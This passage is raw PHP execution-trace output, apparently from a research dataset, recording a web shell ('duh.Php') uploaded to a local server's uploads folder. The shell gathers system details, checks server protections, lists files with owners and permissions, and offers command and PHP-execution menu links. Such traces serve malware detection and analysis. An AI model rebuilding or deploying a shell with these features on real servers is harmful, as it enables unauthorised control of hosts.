3 192 1 0.007440 495520
3 192 R TRUE
2 187 1 0.007453 495480
2 187 R ''
2 193 0 0.007465 495480 perms 1 /var/www/html/uploads/duh.php 42 1 'duh.php'
3 194 0 0.007477 495480 file_exists 0 /var/www/html/uploads/duh.php 57 1 'duh.php'
3 194 1 0.007490 495520
3 194 R TRUE
3 195 0 0.007503 495480 fileperms 0 /var/www/html/uploads/duh.php 57 1 'duh.php'
3 195 1 0.007515 495520
3 195 R 33204
3 196 0 0.007527 495480 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 33204
3 196 1 0.007540 495864
3 196 R '100664'
3 197 0 0.007553 495800 substr 0 /var/www/html/uploads/duh.php 57 2 '100664' -4
3 197 1 0.007565 495896
3 197 R '0664'
2 193 1 0.007578 495512
2 193 R '0664'
2 198 0 0.007591 495736 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 198 1 0.007604 495816
2 198 R '/var/www/html/uploads'
2 199 0 0.007619 495736 realpath 0 /var/www/html/uploads/duh.php 42 1 'duh.php'
2 199 1 0.007631 495824
2 199 R '/var/www/html/uploads/duh.php'
2 200 0 0.007646 495736 perms 1 /var/www/html/uploads/duh.php 42 1 'duh.php'
3 201 0 0.007657 495736 file_exists 0 /var/www/html/uploads/duh.php 57 1 'duh.php'
3 201 1 0.007671 495776
3 201 R TRUE
3 202 0 0.007684 495736 fileperms 0 /var/www/html/uploads/duh.php 57 1 'duh.php'
3 202 1 0.007696 495776
3 202 R 33204
3 203 0 0.007708 495736 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 33204
3 203 1 0.007721 496120
3 203 R '100664'
3 204 0 0.007734 496056 substr 0 /var/www/html/uploads/duh.php 57 2 '100664' -4
3 204 1 0.007746 496152
3 204 R '0664'
2 200 1 0.007758 495768
2 200 R '0664'
2 205 0 0.007772 494456 function_exists 0 /var/www/html/uploads/duh.php 42 1 'posix_getpwuid'
2 205 1 0.007785 494496
2 205 R TRUE
2 206 0 0.007797 494456 function_exists 0 /var/www/html/uploads/duh.php 42 1 'posix_getgrgid'
2 206 1 0.007810 494496
2 206 R TRUE
2 207 0 0.007822 494456 fileowner 0 /var/www/html/uploads/duh.php 42 1 'prepend.php'
2 207 1 0.007837 494504
2 207 R 0
2 208 0 0.007852 494464 posix_getpwuid 0 /var/www/html/uploads/duh.php 42 1 0
2 208 1 0.007875 495264
2 208 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.php 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 209 0 0.007915 494448 filegroup 0 /var/www/html/uploads/duh.php 42 1 'prepend.php'
2 209 1 0.007928 494488
2 209 R 0
2 210 0 0.007940 494448 posix_getgrgid 0 /var/www/html/uploads/duh.php 42 1 0
2 210 1 0.007961 495104
2 210 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.php 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 211 0 0.007995 494528 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 211 1 0.008008 494608
2 211 R '/var/www/html/uploads'
2 212 0 0.008023 494672 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 212 1 0.008035 494752
2 212 R '/var/www/html/uploads'
2 213 0 0.008049 494768 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 213 1 0.008061 494848
2 213 R '/var/www/html/uploads'
2 214 0 0.008076 495088 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 214 1 0.008088 495168
2 214 R '/var/www/html/uploads'
2 215 0 0.008102 495216 realpath 0 /var/www/html/uploads/duh.php 42 1 'prepend.php'
2 215 1 0.008115 495312
2 215 R '/var/www/html/uploads/prepend.php'
2 216 0 0.008131 495472 get_color 1 /var/www/html/uploads/duh.php 42 1 'prepend.php'
3 217 0 0.008144 495472 is_writable 0 /var/www/html/uploads/duh.php 56 1 'prepend.php'
3 217 1 0.008158 495512
3 217 R FALSE
3 218 0 0.008171 495472 is_writable 0 /var/www/html/uploads/duh.php 56 1 'prepend.php'
3 218 1 0.008186 495512
3 218 R FALSE
3 219 0 0.008198 495472 is_readable 0 /var/www/html/uploads/duh.php 56 1 'prepend.php'
3 219 1 0.008212 495512
3 219 R TRUE
2 A /var/www/html/uploads/duh.php 56 $c = ''
3 220 0 0.008235 495472 is_writable 0 /var/www/html/uploads/duh.php 56 1 'prepend.php'
3 220 1 0.008250 495512
3 220 R FALSE
3 221 0 0.008263 495472 is_readable 0 /var/www/html/uploads/duh.php 56 1 'prepend.php'
3 221 1 0.008277 495512
3 221 R TRUE
2 216 1 0.008289 495472
2 216 R ''
2 222 0 0.008302 495472 perms 1 /var/www/html/uploads/duh.php 42 1 'prepend.php'
3 223 0 0.008314 495472 file_exists 0 /var/www/html/uploads/duh.php 57 1 'prepend.php'
3 223 1 0.008328 495512
3 223 R TRUE
3 224 0 0.008341 495472 fileperms 0 /var/www/html/uploads/duh.php 57 1 'prepend.php'
3 224 1 0.008354 495512
3 224 R 33261
3 225 0 0.008366 495472 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 33261
3 225 1 0.008379 495856
3 225 R '100755'
3 226 0 0.008392 495792 substr 0 /var/www/html/uploads/duh.php 57 2 '100755' -4
3 226 1 0.008405 495888
3 226 R '0755'
2 222 1 0.008418 495504
2 222 R '0755'
2 227 0 0.008433 495728 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 227 1 0.008446 495808
2 227 R '/var/www/html/uploads'
2 228 0 0.008461 495728 realpath 0 /var/www/html/uploads/duh.php 42 1 'prepend.php'
2 228 1 0.008499 495824
2 228 R '/var/www/html/uploads/prepend.php'
2 229 0 0.008514 495728 perms 1 /var/www/html/uploads/duh.php 42 1 'prepend.php'
3 230 0 0.008526 495728 file_exists 0 /var/www/html/uploads/duh.php 57 1 'prepend.php'
3 230 1 0.008542 495768
3 230 R TRUE
3 231 0 0.008555 495728 fileperms 0 /var/www/html/uploads/duh.php 57 1 'prepend.php'
3 231 1 0.008567 495768
3 231 R 33261
3 232 0 0.008580 495728 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 33261
3 232 1 0.008592 496112
3 232 R '100755'
3 233 0 0.008605 496048 substr 0 /var/www/html/uploads/duh.php 57 2 '100755' -4
3 233 1 0.008618 496144
3 233 R '0755'
2 229 1 0.008630 495760
2 229 R '0755'
1 3 1 0.008650 494448
0.008699 347168
TRACE END [2023-02-12 23:35:34.379982]
data/traces/d1f9301980fe3353e9ad011975f546ec_trace-1676252680.8838.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:45:06.781674]
1 0 1 0.000157 393512
1 3 0 0.000665 487616 {main} 1 /var/www/html/uploads/duh.Php 0 0
2 4 0 0.000683 487616 error_reporting 0 /var/www/html/uploads/duh.Php 2 1 0
2 4 1 0.000698 487656
2 4 R 22527
1 A /var/www/html/uploads/duh.Php 3 $xyn = 'tunafeesh'
2 5 0 0.000731 487616 basename 0 /var/www/html/uploads/duh.Php 6 1 '/var/www/html/uploads/duh.Php'
2 5 1 0.000746 487680
2 5 R 'duh.Php'
1 A /var/www/html/uploads/duh.Php 6 $me = 'duh.Php'
1 A /var/www/html/uploads/duh.Php 6 $server_soft = 'Apache/2.4.52 (Ubuntu)'
2 6 0 0.000783 487648 php_uname 0 /var/www/html/uploads/duh.Php 6 0
2 6 1 0.000796 487760
2 6 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/duh.Php 6 $uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 7 0 0.000831 487760 get_current_user 0 /var/www/html/uploads/duh.Php 6 0
2 7 1 0.000868 487800
2 7 R 'osboxes'
2 8 0 0.000883 487808 getmyuid 0 /var/www/html/uploads/duh.Php 6 0
2 8 1 0.000895 487808
2 8 R 1000
2 9 0 0.000908 487816 getmygid 0 /var/www/html/uploads/duh.Php 6 0
2 9 1 0.000919 487816
2 9 R 1000
1 A /var/www/html/uploads/duh.Php 6 $cur_user = 'osboxes uid:1000 gid:1000'
2 10 0 0.000943 487824 ini_get 0 /var/www/html/uploads/duh.Php 6 1 'safe_mode'
2 10 1 0.000956 487856
2 10 R FALSE
1 A /var/www/html/uploads/duh.Php 6 $safe_mode = FALSE
1 A /var/www/html/uploads/duh.Php 6 $safe_mode = '<font color=#ccff00>OFF</font>'
2 11 0 0.000992 487824 getcwd 0 /var/www/html/uploads/duh.Php 6 0
2 11 1 0.001004 487872
2 11 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php 6 $cwd = '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php 6 $bckC = '#333333'
1 A /var/www/html/uploads/duh.Php 6 $txtC = '#999999'
2 12 0 0.001049 487872 getenv 0 /var/www/html/uploads/duh.Php 7 1 'HTTP_HOST'
2 12 1 0.001062 487944
2 12 R 'localhost'
1 A /var/www/html/uploads/duh.Php 7 $start = '<html><head><title>localhost </title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-'
2 13 0 0.001104 490032 realpath 0 /var/www/html/uploads/duh.Php 8 1 '.'
2 13 1 0.001118 490112
2 13 R '/var/www/html/uploads'
2 14 0 0.001133 490112 realpath 0 /var/www/html/uploads/duh.Php 8 1 '.'
2 14 1 0.001145 490192
2 14 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php 8 $menu = '<center><p id="menu"><span id="menuB"><<a href="duh.Php">Home</a>> <<a href="?x=cmd&d="/var/www/html/uploads">Command</a>> <<a href="?x=php&d="/var/www/html/uploads">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>'
1 A /var/www/html/uploads/duh.Php 8 $end = '</body></html>'
1 A /var/www/html/uploads/duh.Php 8 $inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> Apache/2.4.52 (Ubuntu) ||| <b><i><u>Uname:</u></i></b> Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 |||</br>||| <b><i><u>User:</u></i></b> osboxes uid:1000 gid:1000 ||| <b><i><u>Safe Mode:</u></i></b> <font color=#ccff00>OFF</font> ||| <b><i><u>Directory: </i></b></u>/var/www/html/uploads |||</p></center><hr>'
2 15 0 0.001214 490688 phpversion 0 /var/www/html/uploads/duh.Php 10 0
2 15 1 0.001226 490752
2 15 R '7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2 16 0 0.001242 491448 zend_version 0 /var/www/html/uploads/duh.Php 10 0
2 16 1 0.001253 491480
2 16 R '3.2.0'
2 17 0 0.001267 491480 magic_quotes 1 /var/www/html/uploads/duh.Php 10 0
3 18 0 0.001279 491480 get_magic_quotes_gpc 0 /var/www/html/uploads/duh.Php 46 0
3 18 1 0.001291 491480
3 18 R FALSE
2 A /var/www/html/uploads/duh.Php 46 $x = FALSE
2 A /var/www/html/uploads/duh.Php 46 $m = '<font color=#ccff00>OFF</font>'
2 17 1 0.001325 491480
2 17 R '<font color=#ccff00>OFF</font>'
2 19 0 0.001340 491480 curl 1 /var/www/html/uploads/duh.Php 10 0
3 20 0 0.001352 491480 extension_loaded 0 /var/www/html/uploads/duh.Php 47 1 'curl'
3 20 1 0.001371 491520
3 20 R TRUE
2 A /var/www/html/uploads/duh.Php 47 $c = '<font color=crimson>ON</font>'
2 19 1 0.001396 491480
2 19 R '<font color=crimson>ON</font>'
2 21 0 0.001411 491480 reg_globals 1 /var/www/html/uploads/duh.Php 10 0
3 22 0 0.001422 491480 ini_get 0 /var/www/html/uploads/duh.Php 48 1 'reqister_globals'
3 22 1 0.001435 491512
3 22 R FALSE
2 A /var/www/html/uploads/duh.Php 48 $r = '<font color=#ccff00>OFF</font>'
2 21 1 0.001459 491480
2 21 R '<font color=#ccff00>OFF</font>'
2 23 0 0.001474 491480 openbase_dir 1 /var/www/html/uploads/duh.Php 10 0
3 24 0 0.001486 491480 ini_get 0 /var/www/html/uploads/duh.Php 45 1 'open_basedir'
3 24 1 0.001498 491512
3 24 R ''
2 A /var/www/html/uploads/duh.Php 45 $x = ''
2 A /var/www/html/uploads/duh.Php 45 $o = '<font color=#ccff00>OFF</font>'
2 23 1 0.001532 491480
2 23 R '<font color=#ccff00>OFF</font>'
2 25 0 0.001546 491480 myql 1 /var/www/html/uploads/duh.Php 10 0
3 26 0 0.001557 491480 function_exists 0 /var/www/html/uploads/duh.Php 51 1 'mysql_connect'
3 26 1 0.001570 491520
3 26 R FALSE
2 A /var/www/html/uploads/duh.Php 51 $m = '<font color=#ccff00>OFF</font>'
2 25 1 0.001594 491480
2 25 R '<font color=#ccff00>OFF</font>'
2 27 0 0.001609 491480 gzip 1 /var/www/html/uploads/duh.Php 10 0
3 28 0 0.001619 491480 function_exists 0 /var/www/html/uploads/duh.Php 53 1 'gzencode'
3 28 1 0.001633 491520
3 28 R TRUE
2 A /var/www/html/uploads/duh.Php 53 $m = '<font color=crimson>ON</font>'
2 27 1 0.001656 491480
2 27 R '<font color=crimson>ON</font>'
2 29 0 0.001671 491480 mssql 1 /var/www/html/uploads/duh.Php 10 0
3 30 0 0.001682 491480 function_exists 0 /var/www/html/uploads/duh.Php 52 1 'mssql_connect'
3 30 1 0.001695 491520
3 30 R FALSE
2 A /var/www/html/uploads/duh.Php 52 $m = '<font color=#ccff00>OFF</font>'
2 29 1 0.001719 491480
2 29 R '<font color=#ccff00>OFF</font>'
2 31 0 0.001733 491480 postgresql 1 /var/www/html/uploads/duh.Php 10 0
3 32 0 0.001744 491480 function_exists 0 /var/www/html/uploads/duh.Php 50 1 'pg_connect'
3 32 1 0.001757 491520
3 32 R FALSE
2 A /var/www/html/uploads/duh.Php 50 $p = '<font color=#ccff00>OFF</font>'
2 31 1 0.001780 491480
2 31 R '<font color=#ccff00>OFF</font>'
2 33 0 0.001795 491480 oracle 1 /var/www/html/uploads/duh.Php 10 0
3 34 0 0.001805 491480 function_exists 0 /var/www/html/uploads/duh.Php 49 1 'ocilogon'
3 34 1 0.001818 491520
3 34 R FALSE
2 A /var/www/html/uploads/duh.Php 49 $o = '<font color=#ccff00>OFF</font>'
2 33 1 0.001841 491480
2 33 R '<font color=#ccff00>OFF</font>'
2 35 0 0.001855 491480 disk_total_space 0 /var/www/html/uploads/duh.Php 10 1 '/'
2 35 1 0.001870 491512
2 35 R 232015802368
2 36 0 0.001884 491480 h_size 1 /var/www/html/uploads/duh.Php 10 1 232015802368
3 37 0 0.001898 491480 round 0 /var/www/html/uploads/duh.Php 54 1 21608.155441284
3 37 1 0.001910 491512
3 37 R 21608
2 A /var/www/html/uploads/duh.Php 54 $s = '216.08GB'
2 36 1 0.001935 491520
2 36 R '216.08GB'
2 38 0 0.001949 491520 disk_free_space 0 /var/www/html/uploads/duh.Php 10 1 '/'
2 38 1 0.001962 491552
2 38 R 200117637120
2 39 0 0.001976 491520 h_size 1 /var/www/html/uploads/duh.Php 10 1 200117637120
3 40 0 0.001988 491520 round 0 /var/www/html/uploads/duh.Php 54 1 18637.407302856
3 40 1 0.002000 491552
3 40 R 18637
2 A /var/www/html/uploads/duh.Php 54 $s = '186.37GB'
2 39 1 0.002025 491560
2 39 R '186.37GB'
1 A /var/www/html/uploads/duh.Php 10 $moreI = ['PHP Version' => '7.2.34-37+ubuntu22.04.1+deb.sury.org+1', 'Zend Version' => '3.2.0', 'Magic Quotes' => '<font color=#ccff00>OFF</font>', 'Curl' => '<font color=crimson>ON</font>', 'Register Globals' => '<font color=#ccff00>OFF</font>', 'OpenBase Dir' => '<font color=#ccff00>OFF</font>', 'MySQL' => '<font color=#ccff00>OFF</font>', 'Gzip' => '<font color=crimson>ON</font>', 'MsSQL' => '<font color=#ccff00>OFF</font>', 'PostgreSQL' => '<font color=#ccff00>OFF</font>', 'Oracle' => '<font color=#ccff00>OFF</font>', 'Total Space' => '216.08GB', 'Used Space' => '186.37GB', 'Your IP' => '127.0.0.1', 'Server IP' => '127.0.0.1']
1 A /var/www/html/uploads/duh.Php 10 $n = 'PHP Version'
1 A /var/www/html/uploads/duh.Php 10 $n = 'Zend Version'
1 A /var/www/html/uploads/duh.Php 10 $n = 'Magic Quotes'
1 A /var/www/html/uploads/duh.Php 10 $n = 'Curl'
1 A /var/www/html/uploads/duh.Php 10 $n = 'Register Globals'
1 A /var/www/html/uploads/duh.Php 10 $n = 'OpenBase Dir'
1 A /var/www/html/uploads/duh.Php 10 $n = 'MySQL'
1 A /var/www/html/uploads/duh.Php 10 $n = 'Gzip'
1 A /var/www/html/uploads/duh.Php 10 $n = 'MsSQL'
1 A /var/www/html/uploads/duh.Php 10 $n = 'PostgreSQL'
1 A /var/www/html/uploads/duh.Php 10 $n = 'Oracle'
1 A /var/www/html/uploads/duh.Php 10 $n = 'Total Space'
1 A /var/www/html/uploads/duh.Php 10 $n = 'Used Space'
1 A /var/www/html/uploads/duh.Php 10 $n = 'Your IP'
1 A /var/www/html/uploads/duh.Php 10 $n = 'Server IP'
2 41 0 0.002261 491560 curpath 1 /var/www/html/uploads/duh.Php 34 1 ''
3 42 0 0.002276 491560 getcwd 0 /var/www/html/uploads/duh.Php 55 0
3 42 1 0.002288 491608
3 42 R '/var/www/html/uploads'
2 A /var/www/html/uploads/duh.Php 55 $d = '/var/www/html/uploads'
2 A /var/www/html/uploads/duh.Php 55 $p = ''
2 A /var/www/html/uploads/duh.Php 55 $n = ''
3 43 0 0.002330 491608 explode 0 /var/www/html/uploads/duh.Php 55 2 '/' '/var/www/html/uploads'
3 43 1 0.002344 492184
3 43 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/duh.Php 55 $dx = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/duh.Php 55 $i = 0
2 A /var/www/html/uploads/duh.Php 55 $g = ''
2 A /var/www/html/uploads/duh.Php 55 $p .= '/'
2 A /var/www/html/uploads/duh.Php 55 $n .= '<a href="?d=/"></a>/'
2 A /var/www/html/uploads/duh.Php 55 $i++
2 A /var/www/html/uploads/duh.Php 55 $g = 'var'
2 A /var/www/html/uploads/duh.Php 55 $p .= 'var/'
2 A /var/www/html/uploads/duh.Php 55 $n .= '<a href="?d=/var/">var</a>/'
2 A /var/www/html/uploads/duh.Php 55 $i++
2 A /var/www/html/uploads/duh.Php 55 $g = 'www'
2 A /var/www/html/uploads/duh.Php 55 $p .= 'www/'
2 A /var/www/html/uploads/duh.Php 55 $n .= '<a href="?d=/var/www/">www</a>/'
2 A /var/www/html/uploads/duh.Php 55 $i++
2 A /var/www/html/uploads/duh.Php 55 $g = 'html'
2 A /var/www/html/uploads/duh.Php 55 $p .= 'html/'
2 A /var/www/html/uploads/duh.Php 55 $n .= '<a href="?d=/var/www/html/">html</a>/'
2 A /var/www/html/uploads/duh.Php 55 $i++
2 A /var/www/html/uploads/duh.Php 55 $g = 'uploads'
2 A /var/www/html/uploads/duh.Php 55 $p .= 'uploads/'
2 A /var/www/html/uploads/duh.Php 55 $n .= '<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 A /var/www/html/uploads/duh.Php 55 $i++
2 41 1 0.002568 491752
2 41 R '<a href="?d=/"></a>/<a href="?d=/var/">var</a>/<a href="?d=/var/www/">www</a>/<a href="?d=/var/www/html/">html</a>/<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 44 0 0.002588 491560 realpath 0 /var/www/html/uploads/duh.Php 35 1 '.'
2 44 1 0.002602 491640
2 44 R '/var/www/html/uploads'
2 45 0 0.002616 491784 realpath 0 /var/www/html/uploads/duh.Php 35 1 '.'
2 45 1 0.002629 491864
2 45 R '/var/www/html/uploads'
2 46 0 0.002644 491944 realpath 0 /var/www/html/uploads/duh.Php 35 1 '.'
2 46 1 0.002656 492024
2 46 R '/var/www/html/uploads'
2 47 0 0.002670 492008 realpath 0 /var/www/html/uploads/duh.Php 35 1 '.'
2 47 1 0.002682 492088
2 47 R '/var/www/html/uploads'
2 48 0 0.002696 492328 realpath 0 /var/www/html/uploads/duh.Php 35 1 '.'
2 48 1 0.002709 492408
2 48 R '/var/www/html/uploads'
2 49 0 0.002722 492456 realpath 0 /var/www/html/uploads/duh.Php 35 1 '.'
2 49 1 0.002734 492536
2 49 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.Php 37 $filex = []
1 A /var/www/html/uploads/duh.Php 38 $dirx = []
2 50 0 0.002777 491672 opendir 0 /var/www/html/uploads/duh.Php 40 1 '.'
2 50 1 0.002796 492064
2 50 R resource(4) of type (stream)
1 A /var/www/html/uploads/duh.Php 40 $handle = resource(4) of type (stream)
2 51 0 0.002828 492032 readdir 0 /var/www/html/uploads/duh.Php 40 1 resource(4) of type (stream)
2 51 1 0.002849 492104
2 51 R '..'
1 A /var/www/html/uploads/duh.Php 40 $file = '..'
2 52 0 0.002873 492064 is_dir 0 /var/www/html/uploads/duh.Php 40 1 '..'
2 52 1 0.002888 492112
2 52 R TRUE
1 A /var/www/html/uploads/duh.Php 40 $dirx[] .= '..'
2 53 0 0.002912 492480 readdir 0 /var/www/html/uploads/duh.Php 40 1 resource(4) of type (stream)
2 53 1 0.002925 492552
2 53 R '.'
1 A /var/www/html/uploads/duh.Php 40 $file = '.'
2 54 0 0.002948 492480 is_dir 0 /var/www/html/uploads/duh.Php 40 1 '.'
2 54 1 0.002961 492520
2 54 R TRUE
1 A /var/www/html/uploads/duh.Php 40 $dirx[] .= '.'
2 55 0 0.002984 492512 readdir 0 /var/www/html/uploads/duh.Php 40 1 resource(4) of type (stream)
2 55 1 0.002997 492584
2 55 R 'duh.Php'
1 A /var/www/html/uploads/duh.Php 40 $file = 'duh.Php'
2 56 0 0.003021 492512 is_dir 0 /var/www/html/uploads/duh.Php 40 1 'duh.Php'
2 56 1 0.003034 492552
2 56 R FALSE
1 A /var/www/html/uploads/duh.Php 40 $filex[] .= 'duh.Php'
2 57 0 0.003058 492920 readdir 0 /var/www/html/uploads/duh.Php 40 1 resource(4) of type (stream)
2 57 1 0.003071 493000
2 57 R 'prepend.php'
1 A /var/www/html/uploads/duh.Php 40 $file = 'prepend.php'
2 58 0 0.003095 492928 is_dir 0 /var/www/html/uploads/duh.Php 40 1 'prepend.php'
2 58 1 0.003109 492976
2 58 R FALSE
1 A /var/www/html/uploads/duh.Php 40 $filex[] .= 'prepend.php'
2 59 0 0.003132 492976 readdir 0 /var/www/html/uploads/duh.Php 40 1 resource(4) of type (stream)
2 59 1 0.003146 493048
2 59 R 'data'
1 A /var/www/html/uploads/duh.Php 40 $file = 'data'
2 60 0 0.003168 492968 is_dir 0 /var/www/html/uploads/duh.Php 40 1 'data'
2 60 1 0.003181 493000
2 60 R TRUE
1 A /var/www/html/uploads/duh.Php 40 $dirx[] .= 'data'
2 61 0 0.003204 492992 readdir 0 /var/www/html/uploads/duh.Php 40 1 resource(4) of type (stream)
2 61 1 0.003217 493072
2 61 R '.htaccess'
1 A /var/www/html/uploads/duh.Php 40 $file = '.htaccess'
2 62 0 0.003239 493000 is_dir 0 /var/www/html/uploads/duh.Php 40 1 '.htaccess'
2 62 1 0.003253 493048
2 62 R FALSE
1 A /var/www/html/uploads/duh.Php 40 $filex[] .= '.htaccess'
2 63 0 0.003276 493048 readdir 0 /var/www/html/uploads/duh.Php 40 1 resource(4) of type (stream)
2 63 1 0.003290 493088
2 63 R FALSE
1 A /var/www/html/uploads/duh.Php 40 $file = FALSE
2 64 0 0.003313 493032 asort 0 /var/www/html/uploads/duh.Php 40 1 [0 => 'duh.Php', 1 => 'prepend.php', 2 => '.htaccess']
2 64 1 0.003330 493064
2 64 R TRUE
2 65 0 0.003342 493056 asort 0 /var/www/html/uploads/duh.Php 40 1 [0 => '..', 1 => '.', 2 => 'data']
2 65 1 0.003357 493088
2 65 R TRUE
1 A /var/www/html/uploads/duh.Php 40 $i = 0
2 66 0 0.003379 493056 function_exists 0 /var/www/html/uploads/duh.Php 41 1 'posix_getpwuid'
2 66 1 0.003393 493096
2 66 R TRUE
2 67 0 0.003405 493056 function_exists 0 /var/www/html/uploads/duh.Php 41 1 'posix_getgrgid'
2 67 1 0.003418 493096
2 67 R TRUE
2 68 0 0.003430 493056 fileowner 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 68 1 0.003444 493088
2 68 R 0
2 69 0 0.003456 493048 posix_getpwuid 0 /var/www/html/uploads/duh.Php 41 1 0
2 69 1 0.003482 493848
2 69 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 70 0 0.003521 493816 filegroup 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 70 1 0.003533 493856
2 70 R 0
2 71 0 0.003546 493816 posix_getgrgid 0 /var/www/html/uploads/duh.Php 41 1 0
2 71 1 0.003569 494472
2 71 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 72 0 0.003607 494504 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 72 1 0.003621 494584
2 72 R '/var/www/html/uploads'
2 73 0 0.003636 494600 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 73 1 0.003649 494680
2 73 R '/var/www/html/uploads'
2 74 0 0.003664 494664 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 74 1 0.003676 494744
2 74 R '/var/www/html/uploads'
2 75 0 0.003690 495080 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 75 1 0.003703 495160
2 75 R '/var/www/html/uploads'
2 76 0 0.003717 495080 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 76 1 0.003729 495160
2 76 R '/var/www/html/uploads'
2 77 0 0.003744 495336 get_color 1 /var/www/html/uploads/duh.Php 41 1 '.'
3 78 0 0.003755 495336 is_writable 0 /var/www/html/uploads/duh.Php 56 1 '.'
3 78 1 0.003772 495376
3 78 R TRUE
2 A /var/www/html/uploads/duh.Php 56 $c = '#ccff00'
3 79 0 0.003796 495336 is_writable 0 /var/www/html/uploads/duh.Php 56 1 '.'
3 79 1 0.003810 495376
3 79 R TRUE
3 80 0 0.003822 495336 is_writable 0 /var/www/html/uploads/duh.Php 56 1 '.'
3 80 1 0.003835 495376
3 80 R TRUE
2 77 1 0.003848 495336
2 77 R '#ccff00'
2 81 0 0.003861 495336 perms 1 /var/www/html/uploads/duh.Php 41 1 '.'
3 82 0 0.003872 495336 file_exists 0 /var/www/html/uploads/duh.Php 57 1 '.'
3 82 1 0.003886 495376
3 82 R TRUE
3 83 0 0.003899 495336 fileperms 0 /var/www/html/uploads/duh.Php 57 1 '.'
3 83 1 0.003911 495376
3 83 R 16895
3 84 0 0.003924 495336 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 16895
3 84 1 0.003937 495720
3 84 R '40777'
3 85 0 0.003950 495656 substr 0 /var/www/html/uploads/duh.Php 57 2 '40777' -4
3 85 1 0.003962 495752
3 85 R '0777'
2 81 1 0.003975 495368
2 81 R '0777'
2 86 0 0.003988 495464 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 86 1 0.004001 495544
2 86 R '/var/www/html/uploads'
2 87 0 0.004015 495464 realpath 0 /var/www/html/uploads/duh.Php 41 1 '.'
2 87 1 0.004028 495544
2 87 R '/var/www/html/uploads'
2 88 0 0.004042 495720 perms 1 /var/www/html/uploads/duh.Php 41 1 '.'
3 89 0 0.004052 495720 file_exists 0 /var/www/html/uploads/duh.Php 57 1 '.'
3 89 1 0.004066 495760
3 89 R TRUE
3 90 0 0.004078 495720 fileperms 0 /var/www/html/uploads/duh.Php 57 1 '.'
3 90 1 0.004090 495760
3 90 R 16895
3 91 0 0.004102 495720 sprintf 0 /var/www/html/uploads/duh.Php 57 2 '%o' 16895
3 91 1 0.004115 496104
3 91 R '40777'
3 92 0 0.004127 496040 substr 0 /var/www/html/uploads/duh.Php 57 2 '40777' -4
3 92 1 0.004140 496136
3 92 R '0777'
2 88 1 0.004152 495752
2 88 R '0777'
1 A /var/www/html/uploads/duh.Php 41 $i++
2 93 0 0.004176 494440 function_exists 0 /var/www/html/uploads/duh.Php 41 1 'posix_getpwuid'
2 93 1 0.004189 494480
2 93 R TRUE
2 94 0 0.004206 494440 function_exists 0 /var/www/html/uploads/duh.Php 41 1 'posix_getgrgid'
2 94 1 0.004220 494480
2 94 R TRUE
2 95 0 0.004232 494440 fileowner 0 /var/www/html/uploads/duh.Php 41 1 '..'
2 95 1 0.004246 494480
2 95 R 0
2 96 0 0.004258 494440 posix_getpwuid 0 /var/www/html/uploads/duh.Php 41 1 0
2 96 1 0.004281 495240
